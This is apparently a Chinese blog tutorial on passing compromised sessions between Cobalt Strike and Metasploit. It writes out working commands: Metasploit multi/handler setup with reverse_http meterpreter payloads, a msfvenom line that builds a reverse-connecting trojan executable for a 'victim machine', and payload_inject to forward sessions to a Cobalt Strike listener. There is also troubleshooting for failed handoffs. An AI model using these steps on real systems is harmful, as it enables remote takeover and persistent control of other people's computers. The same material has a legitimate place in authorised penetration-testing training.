首页 > 其他分享 >MSF与CS互相派生

MSF与CS互相派生

时间:2023-10-15 17:33:59浏览次数:44  
标签:set 派生 端口 CS MSF 监听

目录

CS与MSF互相派生

CS派生给MSF

使用CS建立监听
  1. 创建CS监听端口
  2. 利用创建的CS端口生成控制器
  3. 设法传至受害机并进行运行,收到请求
  4. 建立转发给MSF的监听端口
MSF接收CS派生
  1. 配置MSF
    • 使用multi\handler模块
      use exploit/multi/handler 
      
    • 设置模块的载荷、监听地址及端口
      设置载荷:
      set payload 攻击载荷
      列如:set payload windows/meterpreter/reverse_http
      
      设置地址:
      set LHOST IPaddress
      列如:set LHOST 192.168.49.130
      
      设置端口:
      set LPORT Port
      列如:set LPORT 4445
      
    • 配置填写完成后运行
      • 查看配置
        show options
        
        我所建立的配置为:
      • 后台运行
        • 设置全局监听后不会中断监听
          setg EXITONSESSION false
          
        • 运行
          run -j
          
          或者
          exploit -j
          
      • 查看运行的监听
        jobs

        如果想要杀死本jobs可以使用jobs -k jobId
  2. CS选择想要派生给MSF的监听
    • 选中监听,电击鼠标右键,在弹出的菜单栏重选择Spawn选项
    • 选择之前创建的派生端口进行转发
  3. 可以看到MSF接收到了CS派生过来的会话
    • 进入会话测试是否成功
      session sessionID
      sessions 1
      pwd

      注: 杀死session命令为 sessions -k sessionID
  4. 可能遇到的问题
    • 进行转发的过程发现受害机弹出如下图的错误提示
      "0x00ad0002" 指令引用的 "0x00000000" 内存。该内存不能为 "read" 。
    • 同时发现宿主机的MSF监听失败

      原因一般为MSF创建监听的时候使用的攻击载荷(payload)与CS创建的控制软件选择的监听器攻击载荷不一样导致

MSF派生给CS

使用MSF建立监听
  1. 使用 msfvenom 生成控制木马
    列如:msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.49.130 LPORT=9999 -f exe -o http_9999.exe
    
  2. MSF 设置接收监听的端口
    注意: MSF当中的端口与IP要与第一步msfvenom重生成木马所填写的IP与端口一致
    我设置的options如下:

    使用run -j/exploit -j运行
  3. 受害机运行产生响应测试是否成功
  4. 将 MSF 得到 meterpreter\shell 派生给 CS
    • cs 建立内部监听端口
    • MSF 使用 windows/local/payload_inject 模块
      use exploit/windows/local/payload_inject
      
      备注:若进入了shell\meterpreter又不想退出的可以使用ctrl+Z将起放入后台sessions重运行
    • 配置模块并且运行
      set LHOST CS地址
      set LPORT CS监听端口
      set session sessionID # 想要转发给CS的sessionID
      
    • 观察并测试CS是否得到的监听且是否正确
      • 出现监听
      • 测试是否成功
  5. 可能遇到的问题
    • 运行了,但是MSF控制台出现形如下图的信息,而CS却没用监听到

      需要设置set DisablePayloadHandler true使其不在本地产生session从而干扰CS监听端口获得监听

标签:set,派生,端口,CS,MSF,监听
From: https://www.cnblogs.com/lovesaber157/p/17765866.html

相关文章

  • 使用CS的简单操作
    1.解压并运行cs(1)首先在kali中解压cs压缩包(2)进入cs目录并给予相关权限Chmod777*//chomd命令指给所有文件可读可写可执行权限(777表示可读可写可执行) (3)运行cs文件,设置服务器IP,密码 (4)运行cs的.bat文件 (5)设置IP,端口,用户名,登录密码 (6)登录成......
  • CSS小技巧之单标签loader
    本文翻译自HowtocreateaCSS-onlyloaderwithoneelement,作者:TemaniAfif,略有删改。loader组件是网站的重要组成部分。它可以用在许多地方,我们需要显示的内容正在加载中。这样的组件需要尽可能简单,在这篇文章中我们将学习如何使用优化的代码创建不同的CSS加载器。所有......
  • CSP 2023 游记
    笔者今年(2023年)高一,坐标SC。2023.9.16初赛,然而运势是大凶。真的就我是大凶两点过到了教科院附中门口,没看到教练,同校OIer也都已经进去了。进校之后遇到了这正找考场的sh。14:30开始考试,考生(包括本人)有且仅有4个人。。。发现有一道选择题就是P2765,甚至是样例,所以直接......
  • 【CSS3】CSS3 3D 转换 ③ ( 3D 透视视图 | translateZ 转换分析 | 网页调试工具调试 t
    文章目录一、translateZ转换分析1、translateZ转换对应的空间分析2、网页调试工具调试translateZ属性值二、代码示例-translateZ转换分析1、代码示例-translateZ为0的参照示例2、代码示例-translateZ为200示例一、translateZ转换分析1、translateZ转换对应的......
  • csp2023 第一轮游记
    csp2023第一轮游记Day-20AFO.Day0考试是周六,所以还是正常在学校上课,除了有点担心,还是有点担心(主要是没复习)。考前打了一个代码:#include<bits/stdc++.h>usingnamespacestd;intrp;intmain(){ for(inti=1;;i++) { rp++; printf("%d\n",rp); } re......
  • Make PDF into TIFF with PhotoShop CS 5
     MakePDFintoTIFFEitheropenthePDFdirectlyinyourgraphicssoftwareorright-clickonthePDF'sfilename,select“Openwith...”,andselectthenameofyourgraphicssoftware.Then,usingthetoolsinastandalonegraphicssoftware(AdobePho......
  • CSP模拟6
    第一场就保龄了,开门红A.排序题目给出的是一个排列,所以一定会通过有限次操作来使操作有序。(话说这题上来就搞诈骗)由于数据范围很小,我们直接\(O(n^2)\)暴力枚举即可。而你需要操作逆序对个数次,所以每次交换需要让逆序对的个数减一,所以只需要每次交换值相邻的两个就可以了。......
  • CSS制作逼真的波浪效果
    效果代码示例<!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"/><linkrel="icon"href="/favicon.ico"/><metahttp-equiv="X-UA-Compatible"content="IE=......
  • css 10-13
    1.背影样式 backgroud-color          背景颜色backgroud-color:red backgroud-image         背景图片backgroud-image backgroud-position        背景图片位置backgroud-positiontop  left ......
  • 前端面试题之CSS
    一、CSS基础1.对盒模型的理解CSS3中的盒模型有以下两种:标准盒子模型、IE盒子模型盒模型都是由四个部分组成的,分别是margin、border、padding和content。标准盒模型和IE盒模型的区别在于设置width和height时,所对应的范围不同:标准盒模型的width和height属性的范围只包含了content,IE盒......